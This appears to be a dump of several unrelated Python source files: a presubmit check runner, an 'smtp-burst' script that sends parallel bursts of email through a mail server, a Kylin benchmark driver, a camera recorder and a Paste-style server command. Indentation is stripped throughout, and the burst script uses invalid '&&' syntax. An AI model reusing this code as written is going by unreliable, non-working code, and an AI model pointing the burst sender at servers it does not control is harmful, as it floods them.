output.write("Presubmit checks took %.1fs to calculate.\n\n" % total_time)
if errors:
output.fail()
elif warnings:
output.write('There were presubmit warnings. ')
if may_prompt:
output.prompt_yes_no('Are you sure you wish to continue? (y/N): ')
else:
output.write('Presubmit checks passed.\n')
global _ASKED_FOR_FEEDBACK
# Ask for feedback one time out of 5.
if (len(results) and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK):
output.write(
'Was the presubmit check useful? If not, run "git cl presubmit -v"\n'
'to figure out which PRESUBMIT.py was run, then run git blame\n'
'on the file to figure out who to ask for help.\n')
_ASKED_FOR_FEEDBACK = True
return output
finally:
os.environ = old_environ
def ScanSubDirs(mask, recursive):
if not recursive:
return [x for x in glob.glob(mask) if x not in ('.svn', '.git')]
results = []
for root, dirs, files in os.walk('.'):
if '.svn' in dirs:
dirs.remove('.svn')
if '.git' in dirs:
dirs.remove('.git')
for name in files:
if fnmatch.fnmatch(name, mask):
results.append(os.path.join(root, name))
return results
def ParseFiles(args, recursive):
logging.debug('Searching for %s', args)
files = []
for arg in args:
files.extend([('M', f) for f in ScanSubDirs(arg, recursive)])
return files
def load_files(options, args):
"""Tries to determine the SCM."""
files = []
if args:
files = ParseFiles(args, options.recursive)
change_scm = scm.determine_scm(options.root)
if change_scm == 'git':
change_class = GitChange
upstream = options.upstream or None
if not files:
files = scm.GIT.CaptureStatus([], options.root, upstream)
else:
logging.info('Doesn\'t seem under source control. Got %d files', len(args))
if not files:
return None, None
change_class = Change
return change_class, files
@contextlib.contextmanager
def canned_check_filter(method_names):
filtered = {}
try:
for method_name in method_names:
if not hasattr(presubmit_canned_checks, method_name):
logging.warn('Skipping unknown "canned" check %s' % method_name)
continue
filtered[method_name] = getattr(presubmit_canned_checks, method_name)
setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: [])
yield
finally:
for name, method in filtered.iteritems():
setattr(presubmit_canned_checks, name, method)
def main(argv=None):
parser = optparse.OptionParser(usage="%prog [options] <files...>",
version="%prog " + str(__version__))
parser.add_option("-c", "--commit", action="store_true", default=False,
help="Use commit instead of upload checks")
parser.add_option("-u", "--upload", action="store_false", dest='commit',
help="Use upload instead of commit checks")
parser.add_option("-r", "--recursive", action="store_true",
help="Act recursively")
parser.add_option("-v", "--verbose", action="count", default=0,
help="Use 2 times for more debug info")
parser.add_option("--name", default='no name')
parser.add_option("--author")
parser.add_option("--description", default='')
parser.add_option("--issue", type='int', default=0)
parser.add_option("--patchset", type='int', default=0)
parser.add_option("--root", default=os.getcwd(),
help="Search for PRESUBMIT.py up to this directory. "
"If inherit-review-settings-ok is present in this "
"directory, parent directories up to the root file "
"system directories will also be searched.")
parser.add_option("--upstream",
help="Git only: the base ref or upstream branch against "
"which the diff should be computed.")
parser.add_option("--default_presubmit")
parser.add_option("--may_prompt", action='store_true', default=False)
parser.add_option("--skip_canned", action='append', default=[],
help="A list of checks to skip which appear in "
"presubmit_canned_checks. Can be provided multiple times "
"to skip multiple canned checks.")
parser.add_option("--dry_run", action='store_true',
help=optparse.SUPPRESS_HELP)
parser.add_option("--gerrit_url", help=optparse.SUPPRESS_HELP)
parser.add_option("--gerrit_fetch", action='store_true',
help=optparse.SUPPRESS_HELP)
parser.add_option('--parallel', action='store_true',
help='Run all tests specified by input_api.RunTests in all '
'PRESUBMIT files in parallel.')
options, args = parser.parse_args(argv)
if options.verbose >= 2:
logging.basicConfig(level=logging.DEBUG)
elif options.verbose:
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.ERROR)
change_class, files = load_files(options, args)
if not change_class:
parser.error('For unversioned directory, <files> is not optional.')
logging.info('Found %d file(s).', len(files))
gerrit_obj = None
if options.gerrit_url and options.gerrit_fetch:
assert options.issue and options.patchset
gerrit_obj = GerritAccessor(urlparse.urlparse(options.gerrit_url).netloc)
options.author = gerrit_obj.GetChangeOwner(options.issue)
options.description = gerrit_obj.GetChangeDescription(options.issue,
options.patchset)
logging.info('Got author: "%s"', options.author)
logging.info('Got description: """\n%s\n"""', options.description)
try:
with canned_check_filter(options.skip_canned):
results = DoPresubmitChecks(
change_class(options.name,
options.description,
options.root,
files,
options.issue,
options.patchset,
options.author,
upstream=options.upstream),
options.commit,
options.verbose,
sys.stdout,
sys.stdin,
options.default_presubmit,
options.may_prompt,
gerrit_obj,
options.dry_run,
options.parallel)
return not results.should_continue()
except PresubmitFailure, e:
print >> sys.stderr, e
print >> sys.stderr, 'Maybe your depot_tools is out of date?'
return 2
if __name__ == '__main__':
fix_encoding.fix_encoding()
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(2)
|
burstMain.py | import time, os, sys
from multiprocessing import Process, current_process, Manager, Value
from burstVars import *
from burstGen import *
# Main script routine
if __name__ == '__main__':
print("Starting smtp-burst")
manager = Manager()
SB_FAILCOUNT = manager.Value('i', 0)
print("Generating %s of data to append to message" % (sizeof_fmt(SB_SIZE)))
SB_MESSAGE = appendMessage()
print("Message using %s of random data" % (sizeof_fmt(sys.getsizeof(SB_MESSAGE))))
print("Sending %s messages from %s to %s through %s" % (SB_TOTAL, SB_SENDER, SB_RECEIVERS, SB_SERVER))
for x in range(0, SB_BURSTS):
quantity = range(1, SB_SGEMAILS + 1)
procs = []
if SB_FAILCOUNT.value >= SB_STOPFQNT && SB_STOPFAIL == True :
break
for index, number in enumerate(quantity):
if SB_FAILCOUNT.value >= SB_STOPFQNT && SB_STOPFAIL == True :
break
time.sleep(SB_SGEMAILSPSEC)
process = Process(target=sendmail, args=(number + (x * SB_SGEMAILS), x + 1, SB_FAILCOUNT, SB_MESSAGE))
procs.append(process)
process.start()
for process in procs:
process.join()
time.sleep(SB_BURSTSPSEC) |
kylin.py | from logging import setLogRecordFactory
import queue
import traceback
from threading import Thread
import sqlalchemy as sa
from common import util
class IDEBenchDriver:
def init(self, options, schema, driver_arg):
self.time_of_latest_request = 0
self.isRunning = False
self.requests = queue.LifoQueue()
# kylin properties
print("kylin configuration")
print("kylin host: %s" % driver_arg['host'])
print("kylin database: %s" % driver_arg['db'])
print("kylin table name: %s" % driver_arg['table'])
self.host = driver_arg['host']
self.port = driver_arg['port']
self.user = driver_arg['user']
self.password = driver_arg['password']
self.db = driver_arg['db']
self.table = driver_arg['table']
self.table_to_replace = driver_arg['table_to_replace']
def workflow_start(self):
self.isRunning = True
self.time_of_latest_request = 0
# connection
self.kylin_engine = sa.create_engine('kylin://{}:{}@{}:{}/{}'.format(self.user, self.password, self.host,self.port, self.db), connect_args={'is_ssl': False, 'timeout': 60})
thread = Thread(target=self.process)
thread.start()
def workflow_end(self):
self.isRunning = False
# close connection when done
self.conn.close()
def execute_vizrequest(self, viz_request, options, schema, result_queue):
print("processsing...")
viz = viz_request.viz
sql_statement = viz.get_computed_filter_as_sql(schema)
# make sql acceptable to kylin
sql_statement = sql_statement.replace(self.table_to_replace, self.table)
sql_statement = sql_statement.replace('count', '_count')
print(sql_statement)
viz_request.start_time = util.get_current_ms_time()
self.kylin_engine.execute(sql_statement)
viz_request.end_time = util.get_current_ms_time()
print('kylin query time: '+str(viz_request.end_time-viz_request.start_time))
# write an empty result to the viz_request
viz_request.result = {}
# notify IDEBench that processing is done by writing it to the result buffer
result_queue.put(viz_request)
def process_request(self, viz_request, options, schema, result_queue):
self.requests.put((viz_request, options, schema, result_queue))
def process(self):
while self.isRunning:
try:
request = self.requests.get(timeout=1)
viz_request = request[0]
options = request[1]
schema = request[2]
result_queue = request[3]
# only execute requests that are newer than the last one we processed (drops old/no longer needed queries)
if viz_request.expected_start_time < self.time_of_latest_request:
viz_request.dropped = True
result_queue.put(viz_request)
continue
self.time_of_latest_request = viz_request.expected_start_time
self.execute_vizrequest(viz_request, options, schema, result_queue)
except queue.Empty as e:
# ignore queue-empty exceptions
print('requests queue empty.')
except Exception as e:
traceback.print_exc()
# kylin 出现未知错误, 重获连接
self.kylin_engine = sa.create_engine('kylin://{}:{}@{}:{}/{}'.format(self.user, self.password, self.host,self.port, self.db), connect_args={'is_ssl': False, 'timeout': 60})
pass
|
recorder.py | """Recorder."""
import datetime
import logging
import os
from threading import Thread
import cv2
import viseron.helpers as helpers
from viseron.cleanup import SegmentCleanup
from viseron.mqtt.camera import MQTTCamera
from viseron.segments import Segments
LOGGER = logging.getLogger(__name__)
class FFMPEGRecorder:
"""Creates thumbnails and recordings."""
def __init__(self, config, detection_lock):
self._logger = logging.getLogger(__name__ + "." + config.camera.name_slug)
if getattr(config.recorder.logging, "level", None):
self._logger.setLevel(config.recorder.logging.level)
elif getattr(config.camera.logging, "level", None):
self._logger.setLevel(config.camera.logging.level)
self._logger.debug("Initializing ffmpeg recorder")
self.config = config
self.is_recording = False
self.last_recording_start = None
self.last_recording_end = None
self._event_start = None
self._event_end = None
self._recording_name = None
segments_folder = os.path.join(
config.recorder.segments_folder, config.camera.name
)
self.create_directory(segments_folder)
self._segmenter = Segments(
self._logger, config, segments_folder, detection_lock
)
self._segment_cleanup = SegmentCleanup(config)
self._mqtt_devices = {}
if self.config.recorder.thumbnail.send_to_mqtt:
self._mqtt_devices["latest_thumbnail"] = MQTTCamera(
config, object_id="latest_thumbnail"
)
def on_connect(self):
"""Called when MQTT connection is established."""
for device in self._mqtt_devices.values():
device.on_connect()
def subfolder_name(self, today):
"""Generate name of folder for recording."""
return (
f"{today.year:04}-{today.month:02}-{today.day:02}/{self.config.camera.name}"
)
def create_thumbnail(self, file_name, frame, objects, resolution):
"""Create thumbnails, sent to MQTT and/or saved to disk based on config."""
helpers.draw_objects(
frame.decoded_frame_umat_rgb,
objects,
resolution,
)
cv2.imwrite(file_name, frame.decoded_frame_umat_rgb)
if self.config.recorder.thumbnail.save_to_disk:
thumbnail_folder = os.path.join(
self.config.recorder.folder, "thumbnails", self.config.camera.name
)
self.create_directory(thumbnail_folder)
self._logger.debug(f"Saving thumbnail in {thumbnail_folder}")
if not cv2.imwrite(
os.path.join(thumbnail_folder, "latest_thumbnail.jpg"),
frame.decoded_frame_umat_rgb,
):
self._logger.error("Failed saving thumbnail to disk")
if self.config.recorder.thumbnail.send_to_mqtt and self._mqtt_devices:
ret, jpg = cv2.imencode(".jpg", frame.decoded_frame_umat_rgb)
if ret:
self._mqtt_devices["latest_thumbnail"].publish(jpg.tobytes())
def create_directory(self, path):
"""Create a directory."""
try:
if not os.path.isdir(path):
self._logger.debug(f"Creating folder {path}")
os.makedirs(path)
except FileExistsError:
pass
def start_recording(self, frame, objects, resolution):
"""Start recording."""
self._logger.info("Starting recorder")
self.is_recording = True
self._segment_cleanup.pause()
now = datetime.datetime.now()
self.last_recording_start = now.isoformat()
self.last_recording_end = None
self._event_start = int(now.timestamp())
if self.config.recorder.folder is None:
self._logger.error("Output directory is not specified")
return
# Create filename
now = datetime.datetime.now()
video_name = (
f"{now.strftime(self.config.recorder.filename_pattern)}"
f".{self.config.recorder.extension}"
)
thumbnail_name = (
f"{now.strftime(self.config.recorder.thumbnail.filename_pattern)}.jpg"
)
# Create foldername
subfolder = self.subfolder_name(now)
full_path = os.path.join(self.config.recorder.folder, subfolder)
self.create_directory(full_path)
if frame:
self.create_thumbnail(
os.path.join(full_path, thumbnail_name), frame, objects, resolution
)
self._recording_name = os.path.join(full_path, video_name)
def concat_segments(self):
"""Concatenate FFmpeg segments to a single video."""
self._segmenter.concat_segments(
self._event_start - self.config.recorder.lookback,
self._event_end,
self._recording_name,
)
# Dont resume cleanup if new recording started during encoding
if not self.is_recording:
self._segment_cleanup.resume()
def stop_recording(self):
"""Stop recording."""
self._logger.info("Stopping recorder")
self.is_recording = False
now = datetime.datetime.now()
self.last_recording_end = now.isoformat()
self._event_end = int(now.timestamp())
concat_thread = Thread(target=self.concat_segments)
concat_thread.start()
|
serve.py | # Most of this code is:
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# The server command includes the additional header:
# For discussion of daemonizing:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/278731
# Code taken also from QP:
# http://www.mems-exchange.org/software/qp/
# From lib/site.py
# Galaxy originally used PasteScript and PasteDeploy for application
# loading, to maintain compatibility we've internalized some of that
# code here, stripping out uneeded functionality.
# All top level imports from each package moved here and organized
import ConfigParser
import atexit
import errno
import getpass
import logging
import optparse
import os
import re
import subprocess
import sys
import textwrap
import threading
import time
from logging.config import fileConfig
from loadwsgi import loadapp, loadserver
difflib = None
# ---- from paste.script.bool_optparse --------------------------------
"""
A subclass of ``optparse.OptionParser`` that allows boolean long
options (like ``--verbose``) to also take arguments (like
``--verbose=true``). Arguments *must* use ``=``.
"""
try:
_ = optparse._
except AttributeError:
from gettext import gettext as _
class BoolOptionParser(optparse.OptionParser):
def _process_long_opt(self, rargs, values):
arg = rargs.pop(0)
# Value explicitly attached to arg? Pretend it's the next
# argument.
if "=" in arg:
(opt, next_arg) = arg.split("=", 1)
rargs.insert(0, next_arg)
had_explicit_value = True
else:
opt = arg
had_explicit_value = False
opt = self._match_long_opt(opt)
option = self._long_opt[opt]
if option.takes_value():
nargs = option.nargs
if len(rargs) < nargs:
if nargs == 1:
self.error(_("%s option requires an argument") % opt)
else:
self.error(_("%s option requires %d arguments")
% (opt, nargs))
elif nargs == 1:
value = rargs.pop(0)
else:
value = tuple(rargs[0:nargs])
del rargs[0:nargs]
elif had_explicit_value:
value = rargs[0].lower().strip()
del rargs[0:1]
if value in ('true', 'yes', 'on', '1', 'y', 't'):
value = None
elif value in ('false', 'no', 'off', '0', 'n', 'f'):
# Don't process
return
else:
self.error(_('%s option takes a boolean value only (true/false)') % opt)
else:
value = None
option.process(opt, value, values, self)
# ---- from paste.script.command --------------------------------------
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
class BadCommand(Exception):
def __init__(self, message, exit_code=2):
self.message = message
self.exit_code = exit_code
Exception.__init__(self, message)
def _get_message(self):
"""Getter for 'message'; needed only to override deprecation
in BaseException."""
return self.__message
def _set_message(self, value):
"""Setter for 'message'; needed only to override deprecation
in BaseException."""
self.__message = value
# BaseException.message has been deprecated since Python 2.6.
# To prevent DeprecationWarning from popping up over this
# pre-existing attribute, use a new property that takes lookup
# precedence.
message = property(_get_message, _set_message)
class NoDefault(object):
pass
# run and invoke methods moved below ServeCommand
class Command(object):
def __init__(self, name):
self.command_name = name
max_args = None
max_args_error = 'You must provide no more than %(max_args)s arguments'
min_args = None
min_args_error = 'You must provide at least %(min_args)s arguments'
required_args = None
# If this command takes a configuration file, set this to 1 or -1
# Then if invoked through #! the config file will be put into the positional
# arguments -- at the beginning with 1, at the end with -1
takes_config_file = None
# Grouped in help messages by this:
group_name = ''
required_args = ()
description = None
usage = ''
hidden = False
# This is the default verbosity level; --quiet subtracts,
# --verbose adds:
default_verbosity = 0
# This is the default interactive state:
default_interactive = 0
return_code = 0
BadCommand = BadCommand
# Must define:
# parser
# summary
# command()
def run(self, args):
self.parse_args(args)
# Setup defaults:
for name, default in [('verbose', 0),
('quiet', 0),
('interactive', False),
('overwrite', False)]:
if not hasattr(self.options, name):
setattr(self.options, name, default)
if getattr(self.options, 'simulate', False):
self.options.verbose = max(self.options.verbose, 1)
self.interactive = self.default_interactive
if getattr(self.options, 'interactive', False):
self.interactive += self.options.interactive
if getattr(self.options, 'no_interactive', False):
self.interactive = False
self.verbose = self.default_verbosity
self.verbose += self.options.verbose
self.verbose -= self.options.quiet
self.simulate = getattr(self.options, 'simulate', False)
# For #! situations:
if (os.environ.get('PASTE_CONFIG_FILE')
and self.takes_config_file is not None):
take = self.takes_config_file
filename = os.environ.get('PASTE_CONFIG_FILE')
if take == 1:
self.args.insert(0, filename)
elif take == -1:
self.args.append(filename)
else:
assert 0, (
"Value takes_config_file must be None, 1, or -1 (not %r)"
% take)
if (os.environ.get('PASTE_DEFAULT_QUIET')):
self.verbose = 0
# Validate:
if self.min_args is not None and len(self.args) < self.min_args:
raise BadCommand(
self.min_args_error % {'min_args': self.min_args,
'actual_args': len(self.args)})
if self.max_args is not None and len(self.args) > self.max_args:
raise BadCommand(
self.max_args_error % {'max_args': self.max_args,
'actual_args': len(self.args)})
for var_name, option_name in self.required_args:
if not getattr(self.options, var_name, None):
raise BadCommand(
'You must provide the option %s' % option_name)
result = self.command()
if result is None:
return self.return_code
else:
return result
def parse_args(self, args):
if self.usage:
usage = ' '+self.usage
else:
usage = ''
self.parser.usage = "%%prog [options]%s\n%s" % (
usage, self.summary)
self.parser.prog = self._prog_name()
if self.description:
desc = self.description
desc = textwrap.dedent(desc)
self.parser.description = desc
self.options, self.args = self.parser.parse_args(args)
def _prog_name(self):
return '%s %s' % (os.path.basename(sys.argv[0]), self.command_name)
########################################
## Utility methods
########################################
def pad(self, s, length, dir='left'):
if len(s) >= length:
return s
if dir == 'left':
return s + ' '*(length-len(s))
else:
return ' '*(length-len(s)) + s
def standard_parser(cls, verbose=True,
interactive=False,
no_interactive=False,
simulate=False,
quiet=False,
overwrite=False):
"""
Create a standard ``OptionParser`` instance.
Typically used like::
class MyCommand(Command):
parser = Command.standard_parser()
Subclasses may redefine ``standard_parser``, so use the
nearest superclass's class method.
"""
parser = BoolOptionParser()
if verbose:
parser.add_option('-v', '--verbose',
action='count',
dest='verbose',
default=0)
if quiet:
parser.add_option('-q', '--quiet',
action='count',
dest='quiet',
default=0)
if no_interactive:
parser.add_option('--no-interactive',
action="count",
dest="no_interactive",
default=0)
if interactive:
parser.add_option('-i', '--interactive',
action='count',
dest='interactive',
default=0)
if simulate:
parser.add_option('-n', '--simulate',
action='store_true',
dest='simulate',
default=False)
if overwrite:
parser.add_option('-f', '--overwrite',
dest="overwrite",
action="store_true",
help="Overwrite files (warnings will be emitted for non-matching files otherwise)")
return parser
standard_parser = classmethod(standard_parser)
def quote_first_command_arg(self, arg):
"""
There's a bug in Windows when running an executable that's
located inside a path with a space in it. This method handles
that case, or on non-Windows systems or an executable with no
spaces, it just leaves well enough alone.
"""
if (sys.platform != 'win32'
or ' ' not in arg):
# Problem does not apply:
return arg
try:
import win32api
except ImportError:
raise ValueError(
"The executable %r contains a space, and in order to "
"handle this issue you must have the win32api module "
"installed" % arg)
arg = win32api.GetShortPathName(arg)
return arg
def parse_vars(self, args):
"""
Given variables like ``['a=b', 'c=d']`` turns it into ``{'a':
'b', 'c': 'd'}``
"""
result = {}
for arg in args:
if '=' not in arg:
raise BadCommand(
'Variable assignment %r invalid (no "=")'
% arg)
name, value = arg.split('=', 1)
result[name] = value
return result
def logging_file_config(self, config_file):
"""
Setup logging via the logging module's fileConfig function with the
specified ``config_file``, if applicable.
ConfigParser defaults are specified for the special ``__file__``
and ``here`` variables, similar to PasteDeploy config loading.
"""
parser = ConfigParser.ConfigParser()
parser.read([config_file])
if parser.has_section('loggers'):
config_file = os.path.abspath(config_file)
fileConfig(config_file, dict(__file__=config_file,
here=os.path.dirname(config_file)))
class NotFoundCommand(Command):
def run(self, args):
#for name, value in os.environ.items():
# print '%s: %s' % (name, value)
#print sys.argv
print ('Command %r not known (you may need to run setup.py egg_info)'
% self.command_name)
commands = get_commands().items()
commands.sort()
if not commands:
print 'No commands registered.'
print 'Have you installed Paste Script?'
print '(try running python setup.py develop)'
return 2
print 'Known commands:'
longest = max([len(n) for n, c in commands])
for name, command in commands:
print ' %s %s' % (self.pad(name, length=longest),
command.load().summary)
return 2
# ---- From paste.script.serve ----------------------------------------
MAXFD = 1024
jython = sys.platform.startswith('java')
class DaemonizeException(Exception):
pass
class ServeCommand(Command):
min_args = 0
usage = 'CONFIG_FILE [start|stop|restart|status] [var=value]'
takes_config_file = 1
summary = "Serve the described application"
description = """\
This command serves a web application that uses a paste.deploy
configuration file for the server and application.
If start/stop/restart is given, then --daemon is implied, and it will
start (normal operation), stop (--stop-daemon), or do both.
You can also include variable assignments like 'http_port=8080'
and then use %(http_port)s in your config files.
"""
# used by subclasses that configure apps and servers differently
requires_config_file = True
parser = Command.standard_parser(quiet=True)
parser.add_option('-n', '--app-name',
dest='app_name',
metavar='NAME',
help="Load the named application (default main)")
parser.add_option('-s', '--server',
dest='server',
metavar='SERVER_TYPE',
help="Use the named server.")
parser.add_option('--server-name',
dest='server_name',
metavar='SECTION_NAME',
help="Use the named server as defined in the configuration file (default: main)")
if hasattr(os, 'fork'):
parser.add_option('--daemon',
dest="daemon",
action="store_true",
help="Run in daemon (background) mode")
parser.add_option('--pid-file',
dest='pid_file',
metavar='FILENAME',
help="Save PID to file (default to paster.pid if running in daemon mode)")
parser.add_option('--log-file',
dest='log_file',
metavar='LOG_FILE',
help="Save output to the given log file (redirects stdout)")
parser.add_option('--reload',
dest='reload',
action='store_true',
help="Use auto-restart file monitor")
parser.add_option('--reload-interval',
dest='reload_interval',
default=1,
help="Seconds between checking files (low number can cause significant CPU usage)")
parser.add_option('--monitor-restart',
dest='monitor_restart',
action='store_true',
help="Auto-restart server if it dies")
parser.add_option('--status',
action='store_true',
dest='show_status',
help="Show the status of the (presumably daemonized) server")
if hasattr(os, 'setuid'):
# I don't think these are available on Windows
parser.add_option('--user',
dest='set_user',
metavar="USERNAME",
help="Set the user (usually only possible when run as root)")
parser.add_option('--group',
dest='set_group',
metavar="GROUP",
help="Set the group (usually only possible when run as root)")
parser.add_option('--stop-daemon',
dest='stop_daemon',
action='store_true',
help='Stop a daemonized server (given a PID file, or default paster.pid file)')
if jython:
parser.add_option('--disable-jython-reloader',
action='store_true',
dest='disable_jython_reloader',
help="Disable the Jython reloader")
_scheme_re = re.compile(r'^[a-z][a-z]+:', re.I)
default_verbosity = 1
_reloader_environ_key = 'PYTHON_RELOADER_SHOULD_RUN'
_monitor_environ_key = 'PASTE_MONITOR_SHOULD_RUN'
possible_subcommands = ('start', 'stop', 'restart', 'status')
def command(self):
if self.options.stop_daemon:
return self.stop_daemon()
if not hasattr(self.options, 'set_user'):
# Windows case:
self.options.set_user = self.options.set_group = None
# @@: Is this the right stage to set the user at?
self.change_user_group(
self.options.set_user, self.options.set_group)
if self.requires_config_file:
if not self.args:
raise BadCommand('You must give a config file')
app_spec = self.args[0]
if (len(self.args) > 1
and self.args[1] in self.possible_subcommands):
cmd = self.args[1]
restvars = self.args[2:]
else:
cmd = None
restvars = self.args[1:]
else:
app_spec = ""
if (self.args
and self.args[0] in self.possible_subcommands):
cmd = self.args[0]
restvars = self.args[1:]
else:
cmd = None
restvars = self.args[:]
if (getattr(self.options, 'daemon', False)
and getattr(self.options, 'reload', False)):
raise BadCommand('The --daemon and --reload options may not be used together')
jython_monitor = False
if self.options.reload:
if jython and not self.options.disable_jython_reloader:
# JythonMonitor raises the special SystemRestart
# exception that'll cause the Jython interpreter to
# reload in the existing Java process (avoiding
# subprocess startup time)
try:
from paste.reloader import JythonMonitor
except ImportError:
pass
else:
jython_monitor = JythonMonitor(poll_interval=int(
self.options.reload_interval))
if self.requires_config_file:
jython_monitor.watch_file(self.args[0])
if not jython_monitor:
if os.environ.get(self._reloader_environ_key):
from paste import reloader
if self.verbose > 1:
print 'Running reloading file monitor'
reloader.install(int(self.options.reload_interval))
if self.requires_config_file:
reloader.watch_file(self.args[0])
else:
return self.restart_with_reloader()
if cmd not in (None, 'start', 'stop', 'restart', 'status'):
raise BadCommand(
'Error: must give start|stop|restart (not %s)' % cmd)
if cmd == 'status' or self.options.show_status:
return self.show_status()
if cmd == 'restart' or cmd == 'stop':
result = self.stop_daemon()
if result:
if cmd == 'restart':
print "Could not stop daemon; aborting"
else:
print "Could not stop daemon"
return result
if cmd == 'stop':
return result
self.options.daemon = True
if cmd == 'start':
self.options.daemon = True
app_name = self.options.app_name
vars = self.parse_vars(restvars)
if not self._scheme_re.search(app_spec):
app_spec = 'config:' + app_spec
server_name = self.options.server_name
if self.options.server:
server_spec = 'egg:PasteScript'
assert server_name is None
server_name = self.options.server
else:
server_spec = app_spec
base = os.getcwd()
if getattr(self.options, 'daemon', False):
if not self.options.pid_file:
self.options.pid_file = 'paster.pid'
if not self.options.log_file:
self.options.log_file = 'paster.log'
# Ensure the log file is writeable
if self.options.log_file:
try:
writeable_log_file = open(self.options.log_file, 'a')
except IOError, ioe:
msg = 'Error: Unable to write to log file: %s' % ioe
raise BadCommand(msg)
writeable_log_file.close()
# Ensure the pid file is writeable
if self.options.pid_file:
try:
writeable_pid_file = open(self.options.pid_file, 'a')
except IOError, ioe:
msg = 'Error: Unable to write to pid file: %s' % ioe
raise BadCommand(msg)
writeable_pid_file.close()
if getattr(self.options, 'daemon', False):
try:
self.daemonize()
except DaemonizeException, ex:
if self.verbose > 0:
print str(ex)
return
if (self.options.monitor_restart
and not os.environ.get(self._monitor_environ_key)):
return self.restart_with_monitor()
if self.options.pid_file:
self.record_pid(self.options.pid_file)
if self.options.log_file:
stdout_log = LazyWriter(self.options.log_file, 'a')
sys.stdout = stdout_log
sys.stderr = stdout_log
logging.basicConfig(stream=stdout_log)
log_fn = app_spec
if log_fn.startswith('config:'):
log_fn = app_spec[len('config:'):]
elif log_fn.startswith('egg:'):
log_fn = None
if log_fn:
log_fn = os.path.join(base, log_fn)
self.logging_file_config(log_fn)
server = loadserver(server_spec, name=server_name, relative_to=base, global_conf=vars)
app = loadapp( app_spec, name=app_name, relative_to=base, global_conf=vars)
if self.verbose > 0:
if hasattr(os, 'getpid'):
msg = 'Starting server in PID %i.' % os.getpid()
else:
msg = 'Starting server.'
print msg
def serve():
try:
server(app)
except (SystemExit, KeyboardInterrupt), e:
if self.verbose > 1:
raise
if str(e):
msg = ' '+str(e)
else:
msg = ''
print 'Exiting%s (-v to see traceback)' % msg
if jython_monitor:
# JythonMonitor has to be ran from the main thread
threading.Thread(target=serve).start()
print 'Starting Jython file monitor'
jython_monitor.periodic_reload()
else:
serve()
def daemonize(self):
pid = live_pidfile(self.options.pid_file)
if pid:
raise DaemonizeException(
"Daemon is already running (PID: %s from PID file %s)"
% (pid, self.options.pid_file))
if self.verbose > 0:
print 'Entering daemon mode'
pid = os.fork()
if pid:
# The forked process also has a handle on resources, so we
# *don't* want proper termination of the process, we just
# want to exit quick (which os._exit() does)
os._exit(0)
# Make this the session leader
os.setsid()
# Fork again for good measure!
pid = os.fork()
if pid:
os._exit(0)
# @@: Should we set the umask and cwd now?
import resource # Resource usage information.
maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
if (maxfd == resource.RLIM_INFINITY):
maxfd = MAXFD
# Iterate through and close all file descriptors.
for fd in range(0, maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
if (hasattr(os, "devnull")):
REDIRECT_TO = os.devnull
else:
REDIRECT_TO = "/dev/null"
os.open(REDIRECT_TO, os.O_RDWR) # standard input (0)
# Duplicate standard input to standard output and standard error.
os.dup2(0, 1) # standard output (1)
os.dup2(0, 2) # standard error (2)
def record_pid(self, pid_file):
pid = os.getpid()
if self.verbose > 1:
print 'Writing PID %s to %s' % (pid, pid_file)
f = open(pid_file, 'w')
f.write(str(pid))
f.close()
atexit.register(_remove_pid_file, pid, pid_file, self.verbose)
def stop_daemon(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print 'No PID file exists in %s' % pid_file
return 1
pid = read_pidfile(pid_file)
if not pid:
print "Not a valid PID file in %s" % pid_file
return 1
pid = live_pidfile(pid_file)
if not pid:
print "PID in %s is not valid (deleting)" % pid_file
try:
os.unlink(pid_file)
except (OSError, IOError), e:
print "Could not delete: %s" % e
return 2
return 1
for j in range(10):
if not live_pidfile(pid_file):
break
import signal
os.kill(pid, signal.SIGTERM)
time.sleep(1)
else:
print "failed to kill web process %s" % pid
return 3
if os.path.exists(pid_file):
os.unlink(pid_file)
return 0
def show_status(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print 'No PID file %s' % pid_file
return 1
pid = read_pidfile(pid_file)
if not pid:
print 'No PID in file %s' % pid_file
return 1
pid = live_pidfile(pid_file)
if not pid:
print 'PID %s in %s is not running' % (pid, pid_file)
return 1
print 'Server running in PID %s' % pid
return 0
def restart_with_reloader(self):
self.restart_with_monitor(reloader=True)
def restart_with_monitor(self, reloader=False):
if self.verbose > 0:
if reloader:
print 'Starting subprocess with file monitor'
else:
print 'Starting subprocess with monitor parent'
while 1:
args = [self.quote_first_command_arg(sys.executable)] + sys.argv
new_environ = os.environ.copy()
if reloader:
new_environ[self._reloader_environ_key] = 'true'
else:
new_environ[self._monitor_environ_key] = 'true'
proc = None
try:
try:
_turn_sigterm_into_systemexit()
proc = subprocess.Popen(args, env=new_environ)
exit_code = proc.wait()
proc = None
except KeyboardInterrupt:
print '^C caught in monitor process'
if self.verbose > 1:
raise
return 1
finally:
if (proc is not None
and hasattr(os, 'kill')):
import signal
try:
os.kill(proc.pid, signal.SIGTERM)
except (OSError, IOError):
pass
if reloader:
# Reloader always exits with code 3; but if we are
# a monitor, any exit code will restart
if exit_code != 3:
return exit_code
if self.verbose > 0:
print '-'*20, 'Restarting', '-'*20
def change_user_group(self, user, group):
if not user and not group:
return
import pwd, grp
uid = gid = None
if group:
try:
gid = int(group)
group = grp.getgrgid(gid).gr_name
except ValueError:
import grp
try:
entry = grp.getgrnam(group)
except KeyError:
raise BadCommand(
"Bad group: %r; no such group exists" % group)
gid = entry.gr_gid
try:
uid = int(user)
user = pwd.getpwuid(uid).pw_name
except ValueError:
try:
entry = pwd.getpwnam(user)
except KeyError:
raise BadCommand(
"Bad username: %r; no such user exists" % user)
if not gid:
gid = entry.pw_gid
uid = entry.pw_uid
if self.verbose > 0:
print 'Changing user to %s:%s (%s:%s)' % (
user, group or '(unknown)', uid, gid)
if hasattr(os, 'initgroups'):
os.initgroups(user, gid)
else:
